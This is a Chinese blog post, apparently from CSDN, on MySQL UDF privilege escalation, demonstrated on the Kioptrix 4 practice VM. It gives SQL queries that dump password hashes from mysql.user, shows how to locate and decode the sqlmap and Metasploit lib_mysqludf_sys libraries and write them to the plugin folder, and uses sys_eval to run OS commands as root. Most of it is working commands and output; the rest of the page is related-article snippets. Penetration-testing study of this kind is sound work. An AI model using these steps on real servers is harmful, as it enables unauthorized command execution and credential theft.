【提权】MySQL UDF提权

最新推荐文章于 2024-04-12 22:58:35 发布
最新推荐文章于 2024-04-12 22:58:35 发布
阅读量255 收藏
点赞数
分类专栏: 渗透技巧
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/b10d9/article/details/108910347
版权

MySQL UDF提权

UDF

UDF是MySQL开放的自定义接口,用户可以设计自定义函数实现自定义功能。

UDF涉及的MySQL的版本区别

MySQL 5.0.67开始,UDF库必须包含在plugin文件夹中,可以使用’@@ plugin_dir’全局变量找到它。

获取MySQL基本信息

select @@version_compile_os, @@version_compile_machine;
获取操作系统信息,及运行的是64位还是32位

select @@version; 
查询数据库版本

select @@basedir;
查询MYSQL安装路径

select @@plugin_dir ; 
查看plugin路径

select host, user, password from mysql.user; 
查询hash (MySQL <= 5.6 )

select host, user, authentication_string from mysql.user; 
查询hash (MySQL >= 5.7 )

ps -ef|grep mysqld
查看mysql安装目录、数据目录等。

secure-file-priv参数在不同版本的默认值

secuue-file-priv参数,用于控制MySQL的导出。可以修改my.ini文件中的“secure-file-priv=”。

  • 参数为NULL不允许导出。
  • 参数为空则不做任何限制。
  • 参数为路径则仅运行导出到指定路径。
  • MySQL5.5版本:my.ini中无此参数,查询该参数情况为NULL
  • MySQL5.6版本:my.ini中无此参数,查询该参数情况为空。
  • MySQL5.7版本:my.ini中有此参数,查询该参数情况为数据目录下的Upload文件夹。
    可见MySQL5.6版本默认配置可能存在被利用的风险。

lib_mysqludf_sys

lib_mysqludf_sys:具有与操作系统交互的功能的UDF库。这些函数允许您与MySQL运行的执行环境进行交互。

sqlmap和metasploit都已经支持该功能。sqlmap默认对文件进行了加密,使用前需用sqlmap自带的cloak.py密工具解密。

cloak.py -d -i D:\sqlmap\udf\mysql\windows\32\lib_mysqludf_sys.dll_

目标为windows时,lib_mysqludf_sys.dll;linux时,lib_mysqludf_sys.so
64位时使用_64,32位时使用_32

  • sqlmap:

/usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
/usr/share/sqlmap/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
/usr/share/sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
/usr/share/sqlmap/data/udf/mysql/linux/32/lib_mysqludf_sys.so_

  • metaploit:

/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.so
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll
lib_mysqludf_sys可以提供以下函数执行系统命令:

  • sys_eval,执行任意命令,并将输出返回。
  • sys_exec,执行任意命令,并将退出码返回。
  • sys_get,获取一个环境变量。
  • sys_set,创建或修改一个环境变量。

创建UDF

创建UDF前需要将上述相应的的lib_mysqludf_sys文件上传到MySQL安装目录的lib/plugin文件夹内。(大于等于5.0.67)
创建UDF:

create function function_name returns string soname 'lib_mysqludf_sys_32.dll';

使用UDF:

select sys_eval(‘whoami’);

sys_eval/sys_exec/sys_get/sys_set对应修改命令的function_name即可。
删除UDF:

DROP FUNCTION function_name

查询已有UDFs

mysql.func Table中存放着所有UDFs,通过查询该表获取已有的UDFs。

SELECT * FROM mysql.func;

在kioptrix 4靶机中测试生成一个新的UDF

靶机本身已经上传了lib_mysqludf_sys文件,并已创建了一个sys_exec。我测试新建了一个sys_eval。

mysql> CREATE FUNCTION sys_eval RETURNS string SONAME "lib_mysqludf_sys.so";        
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func
    -> ;
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function | 
| sys_exec              |   0 | lib_mysqludf_sys.so | function | 
| sys_eval              |   0 | lib_mysqludf_sys.so | function | 
+-----------------------+-----+---------------------+----------+
3 rows in set (0.00 sec)

mysql> select sys_eval('ls /home');
+-------------------------+
| sys_eval('ls /home')    |
+-------------------------+
| john
loneferret
robert
 | 
+-------------------------+
1 row in set (0.00 sec)

sys_eval和sys_exec输出结果区别

sys_eval将返回执行结果,sys_exec返回退出码。sys_get和sys_set,后续遇到了再补充吧。

mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| root
              | 
+--------------------+
1 row in set (0.00 sec)

mysql> select sys_exec('whoami');
+--------------------+
| sys_exec('whoami') |
+--------------------+
| NULL               | 
+--------------------+
1 row in set (0.00 sec)

总结

利用前:
1、掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,能是root账号最好。
2、能够将lib_mysqludf_sys文件上传至lib/plugin文件夹内。

  • select 代码 0xcode into dumpfile 路径
  • 直接上传

3、能够创建sys_eval或sys_exec。
4、sqlmap和metasploit都集成了UDF提权。

包大人在此
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL UDF
small_cat's home
10-22 1816
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 是通过这样的方法来实现获取对方主机的system的shell限,从而达到的目的。要实现 UDF 需要有一个动态链接库文件。
MYSQLUDF.dll
06-11
MYSQL UDF.dll MYSQL UDF.dll MYSQL UDF.dll MYSQL UDF.dll
mysql udf文件
02-01
mysql udf文件mysql udf文件
linux——Mysql UDF
最新发布
qq_55202378的博客
04-12 426
UDF:user define fucntion,在mysql中,允许用户创建自定义函数,这些函数可以在SQL查询语句中使用,通过使用UDF,用户可以对数据库执行自定义操作。:生成位置无关代码,PIC(Position independent code),这种代码可以在内存中的任何位置执行,简单查看该EXP,在利用过程中,需要登陆到mysql数据库,新建表,在表中插入编译好的共享库,gcc编译的时候,不指定相关参数,直接接源文件,可能会有各种各样的报错。:仅仅编译源代码,不进行链接,通常生成.o文件。
mysql udf
qq_42307546的博客
04-11 1934
如果目标服务器是windows而且开启了MySQL服务,可以尝试使用mysql 原理:在mysql 可以使用自定义函数进行udf = user defined function 用户自定义函数 对于自定义的函数 在mysql5.1版本以后就需要放在插件插件目录 /lib/plugin ,文件后缀微 dll,c语言编写 可以使用语句查询plugin插件目录 show variables like “%plugin%” ...
【数据库Mysql-UDF
qq_48201589的博客
06-24 415
UDF(user defined function),用户自定义函数。UDF是利用数据库将地限的shell到高限。当我们通过webshell获取到Apache服务器的限,而获取到的用户只是网络服务限www或其他普通用户,则我们可以利用mysqlUDF获取到管理员限。
mysql udf
完美落地
12-06 845
mysqludf方法 01 May 2013 UDF(用户定义函数)是一类对MYSQL服务器功能进行扩充的代码,通常是用C(或C++)写的。通过添加新函数,性质就象使用本地MYSQL函数abs()或concat()。当你需要扩展MYSQL服务器功能时,UDF通常是最好的选择。但同时,UDF也是黑客们在拥有低mysql账号时比较好用的一种方法。 适用场合: 1、目标主机系...
Linux利用UDF库实现Mysql
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
mysql.zip_ROOT_mysql_udf_udf mysql_
09-19
用的 udf 得到root帐号可以用这个
udf_udf_udf.dll下载_mysql_ballsv6__源码
10-04
mysqludf所需要的dll文件,有64位和32位
mysqludf
09-20
mysql免杀UDF 必不可少神器。必须配备
Mysql udf
weixin_43689084的博客
12-11 1566
Mysql udf 操作系统信息和MySQL数据库信息共同决定了udf时dii文件导出的位置,通过获取目标服务器的操作系统信息和MySQL数据库版本信息为后续取奠定基础。 1,获取目标操作系统信息,查看操作系统信息的方法有很多,如果能够执行命令的话,可以通过“systeminfo”命令来获取,如果不能执行命令的话,可以再nmap中通过"nmap target -O"来获取。 2,获取目标...
MysqlUDF
热门推荐
good good study
11-07 1万+
udf通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql限 —> 系统限。限制条件挺多,如下先获取mysql限(连接上了mysql数据库)Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的限,即secure_file_priv的值为空。
Mysql——udf
Zlirving_的博客
05-29 1209
udf UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现在MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用 原理 UDF是利用MYSQL的自定义函数功能,构造特定得DLL将Mysql账号转化为系统system限   利用条件 可利用于windows系统,linux系统 Windows文件是dll文件;linux里面的文件是
MySQLUDF
shawdow_bug的博客
03-05 342
UDF和dll文件 UDF全称User Defined Function,即用户自定义函数,在MySQL中以加载外部插件(dll文件)的方式来创建函数。 我解释一下dll文件: dll文件,又指库文件、动态链接库文件,与之相对的是静态库。我们知道,在编写程序经常需要导入其它库文件以使用内置接口或函数,这些接口或函数如果以静态库的方式引入,那么就先把所有需要用到的程序(包括内置接口和函数)链接在一起,再装载到内存运行。 如果是以动态链接库文件(dll)的方式引入,则是先执行主程序,当用到其它程序时,动态加载
mysql_udf
qq_42383069的博客
03-05 3227
0x00. 环境配置: 安装phpstudy,并且以系统服务模式启动 创建普通用户 在服务中将Apache以普通账户启动 赋予apache目录下logs普通账户写入限 连接大马,测试下当前我们的限 0x01. UDF介绍与使用: 什么是udfudf(Userdefined function)是用户自定义函数。在mysql中函数是什么?比如mysql中常见的sleep(),sum(),ascii()等都是函数。而udf就是为了让我们开发者能够自己写方便自己函数 为了在mysql中使用此

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值